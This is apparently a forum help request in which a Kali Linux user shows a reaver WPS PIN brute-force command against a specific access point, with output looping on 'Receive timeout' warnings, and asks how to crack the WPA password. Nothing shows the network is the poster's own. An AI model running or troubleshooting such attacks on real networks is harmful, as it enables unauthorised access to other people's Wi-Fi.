This issue is really annoying me because I have searched so **** much for the solution but nothing seems to work.
I am having trouble with reaver in my Kali operating system. I have been attempting to crack a WPA password with no success. This message keeps repeating after i execute the command "WARNING: Receive timeout occurred", it loops infinitely. I have attempted to update reaver but i already have the latest version.
Very recently i purchased a brand new USB external network card.. this is the make and model: ALFA AWUS051NH, the actual network chip is a Ralink Technology, Corp. RT3572. The USB device seems great and has no issue entering monitor mode or capturing packets. This USB device is also a recommendation for Kali distro.
This is the exact command i have been running
reaver -i wlan1mon -c 1 -b X:X:X:11:20:0F -vv -N -S -A
and this is the exact result i am receiving
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Switching wlan1mon to channel 1
[?] Restore previous session for X:X:X:11:20:0F? [n/Y] n
[+] Waiting for beacon from X:X:X:11:20:0F
[+] Associated with X:X:X:11:20:0F (ESSID: TNCAP13250F)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
I have tried many different things to solve this issue but nothing seems to work, i have been searching the Internet with zero luck. Please help guys!